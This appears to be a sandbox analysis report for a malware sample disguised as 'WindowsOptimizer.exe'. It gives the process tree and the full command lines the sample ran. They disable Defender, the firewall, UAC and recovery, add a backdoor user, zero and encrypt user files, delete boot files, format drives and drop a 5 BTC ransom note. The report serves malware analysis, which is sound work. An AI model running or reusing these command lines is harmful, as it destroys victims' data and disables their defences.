PID 1480 wrote to memory of 2708 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2708 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2708 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1480 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 3304 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3304 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2036 wrote to memory of 4056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2036 wrote to memory of 4056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1980 wrote to memory of 4872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1980 wrote to memory of 4872 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2148 wrote to memory of 3528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2148 wrote to memory of 3528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1480 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 3588 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3588 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1480 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 856 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 856 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1480 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 2464 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2464 wrote to memory of 1764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1764 wrote to memory of 3524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1764 wrote to memory of 3524 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3628 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cipher.exe
PID 3628 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cipher.exe
PID 1480 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1480 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe C:\Windows\system32\cmd.exe
PID 1844 wrote to memory of 4996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\fsutil.exe
PID 1844 wrote to memory of 4996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\fsutil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe

"C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled

C:\Windows\system32\sc.exe

sc config wuauserv start=disabled

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll

C:\Windows\system32\net.exe

net user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add

C:\Windows\system32\cipher.exe

cipher /E /A /S:C:\Users\Admin\Desktop

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddConfirm.wm"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddDisconnect.cab"

C:\Windows\system32\bcdedit.exe

bcdedit /delete {bootmgr} /f

C:\Windows\system32\efsui.exe

efsui.exe /efs /keybackup

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteCompare.ods"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f

C:\Windows\system32\bcdedit.exe

bcdedit /delete {default} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteResize.mp3"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mountvol X: /s

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DenyOptimize.zip"

C:\Windows\system32\mountvol.exe

mountvol X: /s

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\FormatSubmit.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mountvol X: /d

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\GrantGroup.dib"

C:\Windows\system32\mountvol.exe

mountvol X: /d

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\HideMerge.odt"

C:\Windows\system32\format.com

format C: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinMount.m1v"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinSelect.docx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y

C:\Windows\system32\format.com

format D: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeSwitch.AAC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\Microsoft Edge.lnk"

C:\Windows\system32\format.com

format E: /fs:raw /q /y

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\OptimizeGet.dwfx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopInitialize.zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ReceiveConfirm.mpe"

C:\Windows\system32\bcdedit.exe

bcdedit /delete {current} /f

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoStop.asx"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RegisterRepair.svg"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ResolveStep.xsl"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectMove.MTS"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartOptimize.jpe"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartRestore.001"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepSplit.wax"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SwitchSave.search-ms"

C:\Windows\system32\fsutil.exe

fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\UnblockLock.mp4v"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:C:\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cipher /E /A /S:D:\

C:\Windows\system32\cmd.exe

cmd.exe /c cipher /E /A /S:D:\

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

N/A